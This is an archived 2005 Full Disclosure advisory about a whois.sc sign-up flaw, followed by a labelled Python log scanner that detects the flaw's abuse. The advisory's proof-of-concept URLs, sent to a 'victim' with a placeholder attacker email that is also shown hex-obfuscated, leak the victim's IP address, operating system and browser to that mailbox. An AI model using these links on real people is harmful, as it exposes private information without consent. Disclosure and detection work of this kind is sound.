Full Disclosure mailing list archives

whois.sc not-big-deal hole


From: unknown unknown <unknown.pentester () gmail com>
Date: Wed, 2 Nov 2005 16:53:20 +0000

Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it was an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obfuscate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
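The issue described above, seen from the defender's side: the sign-up endpoint accepts a state-changing action over GET, and the email parameter can be hidden behind double encoding or hex-encoded letters. The following is an added example, not part of the original post and not code from whois.sc; it assumes Apache "combined" access logs and uses constructed sample lines (documentation IP ranges, example.com addresses). It reads the query string without letting the URL library decode it first, so the encoding tricks the post mentions stay visible, then reports which requests reached the `newaccount` action over GET and how the parameters were encoded.

```python
import re
from urllib.parse import urlsplit, unquote

SIGNUP_PATH = "/members/process.html"      # endpoint named in the post
STATE_CHANGING_ACTIONS = {"newaccount"}    # actions that should never be honoured via GET

# Apache "combined" log format (assumption); IP, method, target and User-Agent are the fields we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def raw_query_params(query):
    """Split a query string into {name: raw_value} WITHOUT decoding the values,
    so double encoding and hex-encoded letters are still visible to the checks below."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote(name)] = value
    return params


def encoding_findings(name, raw_value):
    """Describe suspicious percent-encoding in one raw parameter value."""
    findings = []
    once = unquote(raw_value)
    if PCT.search(once):                       # still %XX after one decode -> %25XX was sent
        findings.append(f"{name} is double-encoded")
    # Letters and digits never need percent-encoding; encoding them hides the value from a casual reader.
    if any(chr(int(h, 16)).isalnum() for h in PCT.findall(raw_value)):
        findings.append(f"{name} percent-encodes plain letters/digits")
    return findings


def analyse_line(line):
    """Return a finding dict if the line is a state-changing sign-up request made over GET, else None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    if parts.path != SIGNUP_PATH:
        return None
    raw = raw_query_params(parts.query)
    action = unquote(raw.get("action", ""))
    if action not in STATE_CHANGING_ACTIONS or m["method"] != "GET":
        return None
    findings = [f"state-changing action {action!r} accepted over GET"]
    for name in ("email", "doneurl"):
        if name in raw:
            findings.extend(encoding_findings(name, raw[name]))
    return {
        "ip": m["ip"],
        "ua": m["ua"],
        # decode twice so the reported address matches what a double-decoding server would have used
        "email": unquote(unquote(raw.get("email", ""))),
        "findings": findings,
    }


def scan(lines):
    """Run analyse_line over a log and keep only the flagged requests."""
    return [r for r in (analyse_line(l) for l in lines) if r is not None]


# Constructed sample log lines (not real traffic): a normal POST sign-up, a GET sign-up with a plain
# email, a GET sign-up with a hex-encoded email, and an unrelated lookup that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Nov/2005:16:53:20 +0000] "POST /members/process.html HTTP/1.1" 302 0 '
    '"http://www.whois.sc/members/signup.html" "Mozilla/5.0"',
    '198.51.100.7 - - [02/Nov/2005:16:55:01 +0000] "GET /members/process.html?action=newaccount'
    '&doneurl=%252Freverse-ip%252F&email=test%40test.com HTTP/1.1" 200 512 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.9 - - [02/Nov/2005:16:56:40 +0000] "GET /members/process.html?action=newaccount'
    '&doneurl=%252Freverse-ip%252F&email=%75%73%65%72%40%65%78%61%6D%70%6C%65%2E%63%6F%6D HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux i686)"',
    '203.0.113.8 - - [02/Nov/2005:16:57:12 +0000] "GET /whois/example.com HTTP/1.1" 200 2048 "-" "curl/7.15"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["email"], hit["ua"])
        for f in hit["findings"]:
            print("   -", f)
```

The parsing choice matters: `urllib.parse.parse_qs` would decode `%252F` to `%2F` and `%75%73...` to `user` before the checks ran, so the only way to notice the obfuscation is to keep the raw value and decode it yourself, one round at a time. On the server side the matching fix is simpler than any detection rule: reject `action=newaccount` unless the request method is POST.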